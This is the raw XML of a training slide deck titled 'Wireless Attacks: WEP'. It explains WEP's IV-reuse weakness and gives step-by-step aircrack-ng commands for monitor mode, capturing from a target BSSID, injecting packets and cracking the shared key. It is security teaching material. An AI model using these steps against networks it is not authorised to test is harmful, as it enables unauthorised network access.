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wdp" ContentType="image/vnd.ms-photo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65" r:id="rId5"/>
    <p:sldId id="263" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="264" r:id="rId9"/>
    <p:sldId id="261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6" r:id="rId20"/>
    <p:sldId id="262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599"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="106" d="100"/>
          <a:sy n="106" d="100"/>
        </p:scale>
        <p:origin x="79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5F8D1F-3495-5F4D-8A03-767AF85025C7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/1/17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758BB8-2693-424C-9A85-B0A42E47F6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9804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FE631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/1/17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1A178-2D66-5F4E-9D83-B4A4EFAB5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9065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FE631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/1/17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1A178-2D66-5F4E-9D83-B4A4EFAB5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94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FE631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/1/17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1A178-2D66-5F4E-9D83-B4A4EFAB5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1646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FE631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/1/17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1A178-2D66-5F4E-9D83-B4A4EFAB5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83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FE631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/1/17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1A178-2D66-5F4E-9D83-B4A4EFAB5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6942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FE631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/1/17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1A178-2D66-5F4E-9D83-B4A4EFAB5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052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FE631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/1/17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1A178-2D66-5F4E-9D83-B4A4EFAB5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735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FE631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/1/17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1A178-2D66-5F4E-9D83-B4A4EFAB5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4397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FE631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/1/17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1A178-2D66-5F4E-9D83-B4A4EFAB5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608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FE631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/1/17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1A178-2D66-5F4E-9D83-B4A4EFAB5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1503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FE631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/1/17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1A178-2D66-5F4E-9D83-B4A4EFAB5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0704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4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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3">
            <a:alphaModFix amt="67000"/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colorTemperature colorTemp="89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36042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DFE631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/1/17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F1A178-2D66-5F4E-9D83-B4A4EFAB5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165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4">
              <a:lumMod val="60000"/>
              <a:lumOff val="40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bg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bg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bg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hermit_hacker" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cryptolingus.net/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.stackattack.net/blog/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dl.aircrack-ng.org/breakingwepandwpa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Wireless Attacks: WEP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0" y="5202238"/>
            <a:ext cx="9144000" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Module Type: Basic Method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Module Number: 0x00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Last Updated: 2017-01-01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Author: Hermit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792288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Common Terminology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is WEP?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How is WEP Vulnerable?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Attack: Step by Step</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Additional resources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0432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 Terminology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Wireless Local Area Network (WLAN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A network that is connected wirelessly instead of with physical cables.  Clients communicate with access points (AP), which relay traffic to external networks.  Defined by the 802.11 specification.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Radio Frequency (RF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An electromagnetic wave, such as AM or FM radio.  When referring to WLANs we use pre-defined values called channels, numbered from 1 through 14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Initialization Vector (IV)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A number intended to be used only once as a random seed (alongside a common secret) in cryptography, to uniquely encode data.  IVs are also sometimes called “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nonces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” (meaning “used only once”).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="613026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 Terminology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454859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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>802.11 specification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>defines seven modes for wireless network devices:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Master: Act as an AP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Managed: Act as a client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Monitor: Monitor all traffic, not just one network, without associating first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Promiscuous: Pass all traffic to the CPU, does require associating first, but allows injection back into associated networks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ad-hoc: There is no central AP or infrastructure.  Each device communicates directly with each other device.  Ad-hoc and mesh are not exclusive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mesh: Each device can relay/route packets for other devices, but devices do not communicate directly with each other.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Repeater: Act as a ”dumb” repeater and retransmit received signals.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1679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 Terminology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Service Set Identifier (SSID)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The human readable “friendly” name of a WLAN.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basic SSID (BSSID)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The MAC address of an AP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Extended SSID (ESSID)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A collection of BSSIDs, functionally considered equivalent to an SSID.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="437668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WEP?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Wired </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Equivalency Privacy (WEP) is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>security protocol for WLANs, which suffers from a variety of cryptographic and design </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>weaknesses. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It was part of the 802.11a specification, but is now completely deprecated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>either a 64-bit or 128-bit key, each of which includes a 24-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IV.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>64 bit = 24 bit IV + 40 bit secret key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>128 bit = 24 bit IV + 104 bit secret key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the RC4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>stream cipher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>encrypt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is useless from a security perspective and easily cracked.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6884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is WEP Vulnerable?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RC4 depends upon a truly random key, but WEP uses RC4 with a fixed pre-shared key (of 40 or 104 bits) and a very small IV or nonce (of 24 bits).  Since the majority of each encryption is done using the same value, only a portion of the encryption must be recovered.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In the worst case scenario using modern attacks, it only takes around 50,000 IV captures to completely recover the key because the IV will be reused.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even worse, the design of WEP allows an attacker to modify a captured packet to “just ask” for more packets which will assist in decrypting.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1644748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Attack Setup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assumes that you have a 2016 release of Kali Linux installed, as well as hardware capable of being put into monitor mode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If in doubt, get an Alfa card.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All commands are expected to be run with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>superuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (i.e. root) privileges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-ng suite is expected to be part of the installation.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11033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Attack: Step by Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overview)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Open a terminal window.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Kill any potentially conflicting applications/services.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Identify your wireless device.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Put your wireless device into monitor mode.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Verify monitor mode.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Identify target network.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Begin packet capture from target network.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(optional) Stimulate IV collection.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Crack WEP shared key.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0182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Attack: Step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Open a terminal window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> no graphics here, because if you can’t do this part then the rest of this guide is really beyond you.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="733617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Attack: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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Kill any potentially conflicting applications/services.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sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>-ng check kill</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134589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Attack: Step </a:t>
            </a:r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Identify your wireless device (we’ll use “wlan0” for this tutorial)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sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> -a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="746605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Attack: Step </a:t>
            </a:r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Put your wireless device into monitor mode.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sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>-ng start wlan0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="458277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Attack: Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Verify monitor mode.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sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> -a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1392290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Attack: Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Identify target network (write down SSID, channel, and BSSID)</a:t>
            </a:r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r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>-ng wlan0mon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1239893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Attack: Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Begin packet capture from target network.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sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>-ng --channel {#} --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>ivs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> {BSSID} -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>wep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>-file wlan0mon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1848177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Attack: Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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(optional) Stimulate IV collection.  Run this in a separate terminal window while leaving the other programs executing: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sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>-ng -2 -b {BSSID} -t 1 -c FF:FF:FF:FF:FF:FF -p 0481 wlan0mon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1109150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Attack: Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Crack WEP shared key (your file name will vary based upon how many times you have started the capture).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sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>-ng  wep-file-01.ivs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Leave this running and it will automatically retry whenever a new candidate IV capture threshold is reached until the key is recovered.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1607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328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Additional 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Technical overview of WEP/WPA cracking methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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dl.aircrack-ng.org/breakingwepandwpa.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hermit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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twitter.com/hermit_hacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.cryptolingus.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.stackattack.net/blog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>/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58269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C38E461C-518B-8743-B48E-082B04AB4BEF}" vid="{34810773-EC5F-E947-856B-1E6F7D05B46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Cryptolingus_Presentation_Template</Template>
  <TotalTime>129</TotalTime>
  <Words>939</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>106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Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Wireless Attacks: WEP</vt:lpstr>
      <vt:lpstr>Topics</vt:lpstr>
      <vt:lpstr>Common Terminology</vt:lpstr>
      <vt:lpstr>Common Terminology</vt:lpstr>
      <vt:lpstr>Common Terminology</vt:lpstr>
      <vt:lpstr>What is WEP?</vt:lpstr>
      <vt:lpstr>How is WEP Vulnerable?</vt:lpstr>
      <vt:lpstr>Attack Setup</vt:lpstr>
      <vt:lpstr>The Attack: Step by Step (Overview)</vt:lpstr>
      <vt:lpstr>The Attack: Step 1</vt:lpstr>
      <vt:lpstr>The Attack: Step 2</vt:lpstr>
      <vt:lpstr>The Attack: Step 3</vt:lpstr>
      <vt:lpstr>The Attack: Step 4</vt:lpstr>
      <vt:lpstr>The Attack: Step 5</vt:lpstr>
      <vt:lpstr>The Attack: Step 6</vt:lpstr>
      <vt:lpstr>The Attack: Step 7</vt:lpstr>
      <vt:lpstr>The Attack: Step 8</vt:lpstr>
      <vt:lpstr>The Attack: Step 9</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>Additional Resources</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <SharedDoc>false</SharedDoc>
  <HyperlinksChanged>false</HyperlinksChanged>
  <AppVersion>15.0029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Wireless Attacks: WEP</dc:title>
  <dc:creator>Brian Mork</dc:creator>
  <cp:lastModifiedBy>Brian Mork</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-01-01T08:14:07Z</dcterms:created>
